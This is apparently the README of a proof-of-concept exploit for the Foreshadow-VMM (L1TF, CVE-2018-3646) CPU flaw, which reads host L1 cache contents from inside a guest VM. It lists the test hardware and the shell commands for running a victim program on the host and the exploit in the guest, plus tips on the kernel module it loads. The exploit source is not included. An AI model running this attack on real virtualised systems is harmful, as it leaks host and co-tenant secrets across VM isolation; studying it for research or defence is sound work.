L1TF (Foreshadow) PoC -- read host's information from VM guest
Switch branches/tags
Nothing to show
Clone or download
Latest commit 0615b91 Oct 12, 2018
Failed to load latest commit information.



L1TF PoC read host's information from VM guest

This is a PoC for L1TF-VMM (aka Foreshadow-VMM, CVE-2018-3646), which can be used to read any information residing in host's L1 cache from guest vm. I used a kernel module to modifiy the specific PTE. Although it is not very advanced compared to only use userspace code, it works and is simpler. I write it just for fun. Now, it only works on x86_64.

My machine configuration:


Intel(R) Core(TM) i7-8550U CPU @ 1.80GHz, 8 cpus (1 sockets * 4 cores * 2 threads), 

ubuntu18.04 linux 4.15.0-29-generic, 

virt-manager 1.5.1


Intel Core Processor (Broadwell, no TSX, IBRS), 8 cpus (8 sockets * 1 cores * 1 threads), 

ubuntu18.04 linux 4.15.0-29-generic

Reproduce attack

In host:

$gcc -o victim victim.c && sudo ./victim

In guest:

$cd <path-to-L1TF-g2h>

$sudo su


#time ./foreshadow <victim_phys_addr> <len>

you can also watch my attack video and follow it step by step, see https://www.youtube.com/watch?v=JpBIei7-naA


if you use CTRL+C to interrupt the attack ( you'd better not do that ), you should run the following command to remove the restorePTE.ko module manually (occasionally it may stuck the vm due to "*ptep=bak;" in mod_exit(void), just restart the vm), so that you can start another attack.

#rmmod replacePTE

if you want victim to running on all cpu cores, add -DALL_CPUS to compile flags (gcc -DALL_CPUS -o victim victim.c).

if you don't want to keep trying on a failed-read byte, remove -DKEEP in CFLAGS in Makefile.

you can simply use the following cmd to eliminate the annoying warnning box:

#rm -f /var/crash/*